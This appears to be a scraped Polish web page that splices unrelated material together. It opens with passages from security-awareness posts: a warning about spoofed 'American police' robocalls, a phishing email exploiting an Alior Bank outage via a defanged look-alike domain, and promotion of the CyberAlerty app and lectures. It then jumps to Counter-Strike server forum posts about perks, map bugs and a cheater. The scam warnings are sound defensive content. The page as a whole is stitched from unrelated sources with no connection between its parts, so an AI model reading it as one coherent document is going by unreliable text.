kampanii zdecydowaliśmy się ostrzec przed nią użytkowników naszej aplikacji CyberAlerty. Przy okazji przypominamy, że Zastrzeżenie Pesel już działa i po zalogowaniu do prawdziwego moj.gov.pl możecie sobie włączyć tę ochronę, co zalecamy każdemu — tu znajdziecie szerszy opis zalet tej usługi. Jeśli też chcesz być ostrzegany przed atakami, które mogą zagrozić Twoim danym lub oszczędnością, to zainstaluj CyberAlerty z oficjalnego sklepu Google lub Apple. Aplikacja jest darmowa, nie wymaga rejestracji i jedyne co robi, to wysyła alerty przed cyberzagrożeniami. Przeczytaj cały wpis -
Otrzymujemy od Was zgłoszenia, że z różnych numerów telefonów dzwoni do Was “ktoś z amerykańskiej policji”. Głos w słuchawce informuje, że Wasz dokument został użyty do defraudacji finansowej. Aby uzyskać więcej informacji, jesteście proszeni by wcisnąć “1” na klawiaturze telefonu. Nie róbcie tego! Na czym polega ten scam? Choć żadna z informujących nas o tym oszustwie osób nie podesłała nam nagrania rozmowy (ani nie zdecydowała się na sprawdzenie, co się stanie po naciśnięciu “1”), to podejrzewamy, że to odświeżona wersja scamu, którą opisywaliśmy w tym cyberalertcie. Ostrzegaliśmy w nim przed podobnymi połączeniami, ale wykonywanymi rzekomo przez straż graniczną. Ich celem było wyłudzenie danych i w konsekwencji pieniędzy. Pierwszy raz tę technikę oszustwa obserwowaliśmy w listopadzie 2023. Samo naciśnięcie “1”, nawet jeśli to zrobiliście, nie stanowi żadnego zagrożenia. Problem pojawia się, jeśli ktoś “wejdzie w dialog” z oszustami i przekaże im dodatkowe informacje. Z informacji pozyskanych od naszych informatorów wiemy, że rozmowy od “national police” są wykonywane z zespoofowanych polskich i belgijskich numerów (z przewagą tych pierwszych). Próba oddzwonienia na numer kończy się rozmową z jego zdezorientowanym właścicielem, który o niczym nie ma pojęcia, bo oszuści po prostu posłużyli się jego numerem. Więcej o spoofingu i tym jak się przed nim bronić znajdziecie w tej serii artykułów. Otrzymałem taki telefon — co robić, jak żyć? Jeśli nie podałeś oszustom żadnych informacji, nie masz się czym przejmować. Niestety, otrzymywania takich rozmów nie da się “zablokować”, tym bardziej, że oszuści dzwonią z różnych numerów. To oznacza, żę mogą też podszyć się pod Twój numer. A więc, gdyby dzwonili do Ciebie ludzie, mówiąc że “oddzwaniają, bo z tego numeru dzwoniła do nich policja” to podeślij im ten artykuł :-) Ze względu na skalę dzisiejszego ataku, jego nowy, bardziej wiarygodny niż poprzednie wariant, wysłaliśmy ostrzeżenie przed tymi połączeniami do użytkowników aplikacji CyberAlerty. Jeśli i Ty też chcesz jako pierwszy otrzymywać informacje o najnowszych atakach, które mogą zagrażać Twoim danym lub oszczędnościom, to zainstaluj “CyberAlerty” z oficjalnego sklepu z aplikacjami Google lub Apple. Dziękujemy wszystkim, którzy przesłali nam informację o tym ataku. To dzięki Wam — i wspólnie z Wami — możemy chronić Polaków przed zagrożeniami Ataki e-mailowe, telefoniczne i SMS-owe możecie nam zgłaszać wprost z aplikacji CyberAlerty. Nowych sposobów ataku oszustów jest więcej… Powyższy atak to tylko jedna z metod, jakimi coraz sprytniejsi złodzieje okradają Polaków z danych i pieniędzy. Jeśli chcesz zobaczyć poznać wszystkie aktualne ataki, wpadnij na nasz wykład pt. “Jak nie dać się zhackować?“, który odbędzie się w kilku miastach w Polsce: WARSZAWA, 26 września 2024 -- kliknij tu aby się zapisać! KRAKÓW, 14 października 2024 -- kliknij tu aby się zapisać! WROCŁAW, 20 czerwca 2024 -- kliknij tu aby się zapisać! KATOWICE, 28 czerwca 2024 -- kliknij tu aby się zapisać! POZNAŃ, 24 października 2024 -- kliknij tu aby się zapisać! ŁÓDŹ, 3 października 2024 -- kliknij tu aby się zapisać! Na wykładzie prezentujemy wiele ataków, w tym spoofing telefoniczny, “na żywo”, na uczestnikach wydarzenia. Setki osób, które były na tym wykładzie w Krakowie i Warszawie, oceniły go na 9.62 na 10. Tak, ten wykład to prawdziwa petarda i każdy, kto chce lepiej chronić swoje dane, prywatność i pieniądze przed różnej maści cyberprzestępcami powinien go zobaczyć. Tutaj znajdziesz pełen opis wykładu. Przeczytaj cały wpis
-
Oszuści zaczęli wykorzystywać dzisiejszą i wciąż trwającą awarię systemów Alior Banku do ataku. Właśnie rozesłali wiadomość, w której twierdzą, że konieczna jest ponowna rejestracja wszystkich klientów. Wiadomość wygląda wiarygodnie, jest napisana poprawnym językiem polskim, ale link kieruje pod adres “login.aliorbark[.]com” — widzicie tę subtelną literówkę? Oto infografika przedstawiająca atak, od wiadomości e-mail po ekrany wyłudzające dane: Wpisałem swój login i hasło na lewej stronie, co robić? Natychmiast zadzwoń na infolinię lub udaj się do najbliższego oddziału banku i poinformuj o tym konsultanta. Wysłaliśmy w tej sprawie CyberAlert Ponieważ awaria banku wciąż trwa (aplikacja mobilna nie działa poprawnie), ten atak może mieć większą skuteczność niż podobna wiadomość wysłana w trakcie normalnego funkcjonowania banku. Dlatego my zdecydowaliśmy się rozesłać w tej sprawie CyberAlert, a Ty ostrzeż przed tym atakiem swoich znajomych. Możesz im wysłać naszą infografikę lub udostępnić linka do tego CyberAlertu. Albo po prostu zainstaluj im naszą aplikację CyberAlerty — wtedy, podobnie jak Ty — także będą otrzymywać ostrzeżenia przed atakami, które mogą zagrażać ich oszczędnościom lub danym. Aplikacja jest darmowa i można ją pobrać na Androida lub iPhona. Przeczytaj cały wpis
-
Proponuję usunięcie perku Elektromagnes na małych mapach. Uzasadniam to tym, że np. na fy_pool_day postawimy niedaleko basenu po przeciwnej stronie od plantu bomby, magnes sięga na całą mapę. Również na mapie cs_wiocha gdy postawimy w okolicach mostu, nie sięga tylko hostów. Podobnie jest na mapie fy_out, gdy postawimy elektromagnes na środku mostu/pod nim.sięga on na całą mapę. Wnoszę o usunięcie/zablokowanie go na "Małych mapach"
-
Chcialabym zglosic prosbe zmiany piosenki podczas zabawy ganiany, jest wrecz asluchalna i wulgarna (przepraszam za wyrazenie) do porzygu.I tak wpisac /off mozna ale po prostu sie to nie nadaje na serwer, na ktorym czasem tez graja dzieci. Inaczej to wyglada z piosenkami po angielsku, nie kazdy w nich az tak zwraca uwage na tekst i przeklenstwa zawarte w nich (mowie przy okazji bo i takie tez sa podczas innych zabaw) that's it.
-
Wróciłem postrzelać na serwer po krótkiej przerwie i opowiem wam jak wygląda rozgrywka. 1. Rozgrzewka, trafiasz na typa z atutem, który daje rakiety, dostajesz na łeb rakietę na rozgrzewce i padasz. Zero normalnego strzelania. 2. Ten sam typ gra terminatorem 40+, terminator ma w sobie kilka rakiet, dochodzą rakiety z atutu, dostajesz rakietę z klasy plus rakietę w tym samym momencie z atutu, padasz od razu. Zero strzelania. 3. Przykład, office rats - siedzisz na respie, bo lecą zwykłe rakiety, że wyjść się nie da. Niestety to nic nie pomaga, bo inna osoba ma rakiety samonaprowadzające, więc nie ukryjesz się nigdzie, bo zabija cię nimi w każdym kącie. Zero strzelania. 4. Strzelasz się z terminatorem, chłop ma jakiś tam (spory) procent na to, że strzał, który wykona zabije cię na raz - siada to tak często, że szkoda strzępić ryja. 5. Idzie grupka 3 osób z tej samej drużyny, zza winkla wychyla się terminator, trafia tylko jednego z grupki, ten wybucha, a wraz z nim tych dwóch, którzy byli obok. Śmieszne. Na serwerze lata tyle rakiet, że ktoś kto pierwszy raz wbija tam pograć, wychodzi szybciej niż tam trafił, bo co to za przyjemność z gry kiedy padasz co runda od rakiety. Jak tak dalej pójdzie to na serwerze będą grać tylko sami rakieciarze. Hrr
-
wystawiłem przedmiot deagla za 10 euro na rynku . i ten digl nie był widoczny na rynku nikt go nie kupił bo mi euro nie przyszło . a w moje przedmioty też nic nie ma a skina zabrało a czas dałem na 100 h
-
na mapie jail_komando_b5 nie działa od dłuższego czasu marker fajnie gdyby to zostało naprawione
-
na mapie jail_minecraft_night_b2 na zabawie GunGame Day drugi poziom czyli Mp5 zamiast Mp5 jest paintball i nie da się z niego zabić i trzeba zabić z knife fajnie gdybyście to poprawili
-
Siema uwage mam do wczorajszego resetu na poczatek nie dziala podglad skinow : D ide szukac jeszcze czegos
-
Siema a więc tak na początek do poprawy 1. Interp na zwykłych mapach jest 0.1 na mapach GO. Mamy 0.016000 chyba coś koło tego celuję w typa z AWP w ciało nie dostaje a już nie wspomnę o głowie i to nie wina steam/nosteam tylko interpu Prosił bym o wymuszanie interpu na 0.01 lub go wyłączenie każdy bd miał taki jak sobie ustawi albo menu z wyborem interpu 0.01 0.02 0.03 2. Zmiany mapy np. Pokazuje że jest 10 rund do zmiany oraz że pozostały 2min. Do zmiany zmienia po upływie czasu 3. Jackpot wgl nie losuje
-
Witam chce zwrócić uwagę administracji z servera Only Mirage #1 (147.135.199.66:27015), gracz o nicku: ✪ NEREBAK biega odpalony na wallhacku, a z racji że nie posiadam admina nie mam jak go zbanować, proszę zobaczyć demko godzina 8:30 do 8:45 w tych godzinach wbiłem na server, oraz mam jeszcze jedną sprawę by uspokoić lub potraktować mutem/gagiem gracz o nicku: iwanXkoks owy gracz wyzywa innych gdy zwracają mu uwagę, dzisiaj złożyłem podanie mam nadzieje że zostanie ono przyjęte i wprowadzę trochę porządku na server, z góry dziękuję.
-
A więc chodzi o to ze ile razy straznik czy tez admin najczesciej jak nie zawsze przy pytaniu nowej osiby w ct daja te same pytania. Mianowicie ile jest polecen do odwolania i jeszcze pytaja odnosnie totalnego bezruchu. Wczoraj byla sytuacja ze popytalem jedna osobe i gdy dalem inne pytanie to juz byl problem i uslyszalem:"ale admini o to nie pytaja". Mianowicie zapytalem co sie dzieje jesli prowadzacy da 3 polecenia do odwolania. Takze jest jedna prosba. ZADAWAJCIE TEZ INNE PYTANIA SPRAWDZAJACE ZNAJOMOSC REGULAMINU. PRZECIEZ NIE CHCEMY BY LUDZIE ROBILI FK I PSULA SIE ATMOSFERA PANUJACA NA SERVERZE. POZDRAWIAM CIEPLUTKO
- 6 odpowiedzi
-
- 3
-
-
-
-
- uwaga
- strażników
- (i 1 więcej)
-
Witam. Aktualnie grając na naszym CODzie zauważyłem jedną rzecz. Nie wiem czy to błąd czy nie, ale zobaczymy. Mianowicie, posiadam atut pancernik. Opis atutu powiadamia nas, że jesteśmy odporni na granaty i błyskawice. Jednak nie jest to do końca prawdą, ponieważ, gdy ktoś posiada perk smoker i tak on mnie zatruwa. Czy tak ma być, czy to jest po prostu błąd?
-
Witam czy tylko mi to wyskakuje? Aktualnie mapa de_cache nie mogę wbić.
-
Ostatnio przeglądający 0 użytkowników
- Brak zarejestrowanych użytkowników przeglądających tę stronę.